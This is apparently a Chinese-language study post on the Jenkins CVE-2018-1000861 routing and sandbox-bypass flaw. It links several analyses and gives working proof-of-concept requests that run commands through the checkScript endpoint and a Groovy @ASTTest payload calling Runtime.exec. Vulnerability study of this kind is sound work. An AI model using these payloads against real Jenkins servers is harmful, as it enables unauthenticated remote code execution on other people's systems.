Jenkins的CVE-2018-1000861学习

    xiaoxiao2022-07-04  113

    绿盟的分析: http://blog.nsfocus.net/jenkins-routing-resolution-and-sandbox-bypass-vulnerability-analysis-report/ 主要将了Jenkins的动态路由机制。

    参考: https://www.lucifaer.com/2019/03/04/Jenkins RCE分析(CVE-2018-1000861分析)/ https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/

    PoC

    http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript ?sandbox=true &value=public class x { public x(){ "touch /tmp/success".execute() } }

    url编码之后的:

    /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { public x(){"touch /tmp/jenkins_AtWOLi".execute()}}

    参考: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861

    // 这句将req中的字符串转换成Jenkins自己规范的路由 // 比如这里将/jenkins_2_150_3/securityRealm/admin/test/转换成/securityRealm/admin/test/ String servletPath = getServletPath(req);

    先在终端设置一下classpath:

    export CLASSPATH="/Applications/tomcat-8.0.38/webapps/jenkins-2.150.3/WEB-INF/lib/"

    然后执行poc.groovy。Groovy环境安装参考:https://blog.csdn.net/caiqiiqi/article/details/90450023

    import groovy.transform.ASTTest @ASTTest(value={ assert java.lang.Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator") }) class Main { static void main(args){ } }

    最新回复(0)